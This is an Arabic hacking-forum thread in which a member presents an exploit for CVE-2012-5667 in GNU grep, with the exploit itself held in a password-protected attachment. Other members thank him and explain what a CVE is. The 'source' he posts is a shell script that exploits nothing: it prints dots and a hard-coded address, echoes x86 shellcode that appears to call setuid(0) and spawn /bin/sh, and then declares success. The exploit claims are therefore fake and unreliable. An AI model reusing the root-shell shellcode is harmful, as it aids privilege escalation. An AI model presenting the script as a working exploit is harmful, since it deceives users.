Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


chevr0sky | RCE St4r |
  • شكراً: 290
  • تم شكره 3278 مرة في 527 مشاركة

السلام عليكم و رحمة الله و بركاته.


هذا إستغلال للثغرة CVE-2012-5667


http://cve.mitre.org/cgi-bin/cvename...=CVE-2012-5667



ما هو suid ؟ : http://en.wikipedia.org/wiki/Setuid


POC :







الإستغلال في المرفقات.

باسوورد فك الضغط : chevr0sky

X01do3 :: عضو خاص ::
  • شكراً: 1399
  • تم شكره 1624 مرة في 364 مشاركة

كلما أدبني الدهــــر أراني نقص عقلي *** وإذا ما ازددت علما زادني علما بجهلي

Like :D

تم التجريب كالعادة كل شئ يجي من عندك يكون موزون

بارك الله فيك أخي العزيزي

توقيع
لا اله الا الله محمد رسول الله
2 أعضاء قالوا شكراً لـ X01do3 على المشاركة المفيدة:
Mr.haili عضو مميز
  • شكراً: 696
  • تم شكره 260 مرة في 116 مشاركة

يعطيك العافيه

ولاكن ماهو الــcve ؟ هاي ثغره بالسيرفرات ولا كيف مافهمت ~!

الأعضاء الذين قالوا شكراً لـ Mr.haili على المشاركة المفيدة:
b0y مراقب
  • شكراً: 3113
  • تم شكره 2558 مرة في 509 مشاركة

المشاركة الأصلية كتبت بواسطة Mr.haili اقتباس :
يعطيك العافيه

ولاكن ماهو الــcve ؟ هاي ثغره بالسيرفرات ولا كيف مافهمت ~!
ال"CVE-2012-5667" عنوان الثغرة !!
Deاستبدال scription
Multiple integer overflows in GNU Grep before 2.11 might allow context-dependent attackers to execute arbitrary code via vectors involving a long input line that triggers a heap-based buffer overflow.
يعني الأمر grep الإصدار ما قبل ال2.11 مصاب بهاي الثغرة !!
للتأكد من الإصدار نفذ الأمر : grep -V
بالتوفيق

توقيع


المشاركة الأصلية كتبت بواسطة ApOcalYpse اقتباس :
فقط توقف عن طلب النتيجة و تخيلها و السعي خلفها و قم بما عليك القيام به
...
الناس تحب النتيجة و لكنها تكره الطريق الصعب الذي يوصل اليها
المشاركة الأصلية كتبت بواسطة Sec4ever اقتباس :
فيه حكمة مهمة جدا ينقصنا نحن المسلمون العمل بها حتى تكون لنا مكانة بين الأخرين :

يجب العمل قدر المستطاع و ليس قدر الحاجة .
المشاركة الأصلية كتبت بواسطة UzunDz اقتباس :
ثانيا فيه ادمغة من العرب وموجودين معنا هنا بالمنتدى ويقدمو مواضيع ما تجدها عند الأجانب والتقليل من شان العرب امام الأجانب يسمى جهل و نقص في الشخصية ونوعية هذا الكلام لا تفيدنا الا في الرجوع الى الوراء,, وان كنت شايف نفسك متوقف في كيفية صنع ليتر فهذا لا يعني ان الجميع متوقف هناك بمعنى آخر لا تتكلم بصيغة الجمع عن العرب لأنك تمثل نفسك فقط
المشاركة الأصلية كتبت بواسطة chevr0sky اقتباس :
أنصحك بالتشمير عن سواعدك و الكد و التعب و كذلك سهر الليالي فلا توجد خلطة أو وصفة توصلك إلى مبتغاك.

4 أعضاء قالوا شكراً لـ b0y على المشاركة المفيدة:
chevr0sky | RCE St4r |
  • شكراً: 290
  • تم شكره 3278 مرة في 527 مشاركة

المشاركة الأصلية كتبت بواسطة Mr.haili اقتباس :
يعطيك العافيه

ولاكن ماهو الــcve ؟ هاي ثغره بالسيرفرات ولا كيف مافهمت ~!

معنى CVE

http://www.security-database.com/about.php?type=cve

2 أعضاء قالوا شكراً لـ chevr0sky على المشاركة المفيدة:
b0x .:: Sec4ever The Great ::.
  • شكراً: 1421
  • تم شكره 3840 مرة في 691 مشاركة

يعطيك العافية شفروسكي من زمان عن مواضيعك الرائعة صديقي

الأعضاء الذين قالوا شكراً لـ b0x على المشاركة المفيدة:
chevr0sky | RCE St4r |
  • شكراً: 290
  • تم شكره 3278 مرة في 527 مشاركة

المشاركة الأصلية كتبت بواسطة zaidoohxhacker اقتباس :
يعطيك العافية شفروسكي من زمان عن مواضيعك الرائعة صديقي
مشكور أخي زيد على ردك, بارك الله فيك.

الأعضاء الذين قالوا شكراً لـ chevr0sky على المشاركة المفيدة:
zrxrz عضو نشيط
  • شكراً: 86
  • تم شكره 34 مرة في 23 مشاركة

src please ?

chevr0sky | RCE St4r |
  • شكراً: 290
  • تم شكره 3278 مرة في 527 مشاركة

المشاركة الأصلية كتبت بواسطة zrxrz اقتباس :
src please ?

كود PHP:
#!/bin/sh
sleep 1
echo "CVE-2012-5667: vulnerable."
sys="123"

        
for i in `seq 1 $sys`
        do
                
ind=$RANDOM
                
if [ "$ind-le "16380" ]
                
then
                        
echo -"."
                                                
sleep 0.5
                
else
                        echo -
"."
                
fi
        done
                sleep 1
                
echo " "
                
echo "EGG address: 0xbffff573"
                
sleep 1
                
echo "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
                
echo "\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
                
echo "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
                
echo "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
                
echo "\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"

sleep 2

echo "you got!"
echo " " 

2 أعضاء قالوا شكراً لـ chevr0sky على المشاركة المفيدة:
Processeur-Dz عضو مميز
  • شكراً: 945
  • تم شكره 392 مرة في 123 مشاركة

برك لله فيم خونا جميل :__)

توقيع

الأعضاء الذين قالوا شكراً لـ Processeur-Dz على المشاركة المفيدة:
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever